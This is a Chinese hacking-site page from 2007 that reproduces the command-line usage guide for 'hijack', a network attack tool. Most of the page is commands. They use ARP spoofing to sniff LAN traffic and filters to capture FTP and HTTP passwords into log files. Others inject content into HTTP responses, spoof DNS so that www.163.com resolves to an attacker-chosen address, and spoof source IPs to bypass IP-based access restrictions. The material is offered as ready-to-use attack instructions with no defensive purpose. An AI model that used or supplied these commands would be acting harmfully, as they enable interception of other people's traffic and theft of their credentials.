黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 黑软介绍 >> 正文
·完美空间提供500M免费AS04-10·企业安全之YY内网准入以04-09
·企业安全之意识与策略04-09·剑走偏锋:IIS漏洞利用04-09
·我来免费网提供100M免费04-09·1122mb.com提供20G超大免04-08
·映像劫持与反劫持技术04-07·让所有"暴力删除工具"无04-07
·入侵88red系统的详细过程04-07·Sql Injection脚本注入终04-07
·vbs+delphi 反弹后门生成04-07·飞讯网提供100MB免费PHP04-07
·突破SQL注入攻击时输入框04-04·结合内核和病毒技术的最04-04
·Real Player rmoc3260.d04-04·亿万网络今月最后为您提04-04
·php+mysql 5 sql inject04-03·Real Player rmoc3260.d04-03
·oblog文件下载漏洞04-03·免费啦提供1G-2G免费全能04-03
·完全解析网页后门和挂马04-02·一句话开3389(只测试过04-02
·萧萧免费空间网提供100M04-02·谷道免费空间网提供1G免04-01
·从本地入手解决双线路由03-31·sablog 1.6 多个跨站漏洞03-31
·富文本编辑器的跨站脚本03-31·Cookie注入是怎样产生的03-31
[推荐]hijack(红狼安全小组原创作品 - 内部版)
      ★★★★★

hijack(红狼安全小组原创作品 - 内部版)

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-11-29 16:02:50


// 常用功能举例说明

显示网卡列表
hijack /L

扫描子网
hijack /sd3

结束一个现有的实例
hijack /k
______________________________________________________
// 嗅探功能举例说明

嗅探子网,程序自动转发 (可以匹配,但不能设置过滤规则)
hijack /d3 192.168.16.* 192.168.16.1

嗅探子网,同上, 双向欺骗
hijack /fd3 192.168.16.* 192.168.16.1

嗅探子网,同上,退出Console, 进入后台运行
hijack /Hfd3 192.168.16.* 192.168.16.1

嗅探子网,同上,退出Console, 进入后台运行, 120秒后程序自动退出
hijack /Hfd3 /E 120 192.168.16.* 192.168.16.1

嗅探子网,同上,退出Console, 进入后台运行, 120秒后程序自动重新运行
hijack /Hfd3 /R 120 192.168.16.* 192.168.16.1

嗅探子网,程序自动转发,发送RARP欺骗包间隔为100微秒
hijack /d3 /S 100 192.168.16.* 192.168.16.1

嗅探子网,同上, 强制指定子网掩码为255.255.255.0
hijack /d3 /S 100 /b 255.255.255.0 192.168.16.* 192.168.16.1

嗅探子网,系统自动转发 (效率高, 可以设置BPF规则) 以下为嗅探FTP密码 "|" 为条件分隔符
hijack /rqd3 192.168.16.* 192.168.16.1 "USER|PASS" "tcp and dst port 21"

同上,将信息保存到pass.log里,pass.log里有详细的FTP密码信息
hijack /rqd3 /l pass.log 192.168.16.* 192.168.16.1 "USER|PASS" "tcp and dst port 21"

嗅探子网,一些常见的HTTP密码, 不区分大小定(i选项打开), 保存数据包到pass.dat里
hijack /rqid3 /O pass.dat 192.168.16.* 192.168.16.1 "username=|password=" "tcp and dst port 80"

还原数据包数据,程序将显示嗅探到的数据包
hijack /I packet.dat

自定义要嗅探的主机用","分隔,如:
hijack /rd3 192.168.16.3,192.168.16.8,192.168.16.10-20 192.168.16.1

_______________________________________________________________
// 数据包修改功能举例说明

释放一个替则文件
hijack /N
释放的文件如下:

----
gzip
----
gxip
----
http-insert
----
<center>hijack</center>
----

程序以"----"为分隔符,第一个字符串为原字符串,第二个字符串为替换后的字符串,最大长度都为256字节, 往下再重复
如果是原字符串为http-insert,表始要进行HTTP会话劫持,程序将下一条字符串插入到HTTP响应包里

劫持网关到子网之间的数据, 并显示详细信息
hijack /vd3 /p 80 /S 100 /F job.txt 192.168.16.1 192.168.16.*

修改后的数据用'\0'字符填充
hijack /vod3 /p 80 /S 100 /F job.txt 192.168.16.1 192.168.16.*

修改后的数据用'\0'字符填充
hijack /vod3 /p 80 /S 100 /F job.txt /c "404" 192.168.16.1 192.168.16.*

_______________________________________________________________
// DNS欺骗说明, 需打开-D选

DNS欺骗与数据包修改唯一不同的就是规则文件,一个实例的DNS欺骗需要用的规则文件如下

----
www.163.com
----
192.168.16.3
----
*
----
192.168.16.1
----

欺骗后 就把www.163.com的IP解析成了192.168.16.3, 其它所有的都解析为192.168.16.1

DNS欺骗www.163.com为192.168.16.3

规则文件dns.txt如下
----
www.163.com
----
192.168.16.3
----
命令如下:
hijack /Dvd3 /F dns.txt 192.168.16.* 192.168.16.1
注意: 实例中dns查询包是从内网到外网发送的,所以欺骗方向要注意
_______________________________________________________________
// IP欺骗说明, 需打开-z选项

hijack /zd3 202.108.22.33 202.108.22.1 61.163.83.11 202.102.245.9

实例是在公网上实现的,如果202.108.22.33的21端口做了IP限制,只允许202.102.245.9访问(可以嗅探得到)
攻击者IP是61.163.83.11,则可以通到上面的命令突破IP限制

____________________________________________________________

// 网速限制说明
限制子网网速为20K/S, 本机不在统计内

hijack /fd3 /m 20 192.168.16.* 192.168.16.1

上一页  [1] [2] 

文章录入:cainiaowang    责任编辑:cainiaowang 
【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
VIP 专 区
没有相关文章
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886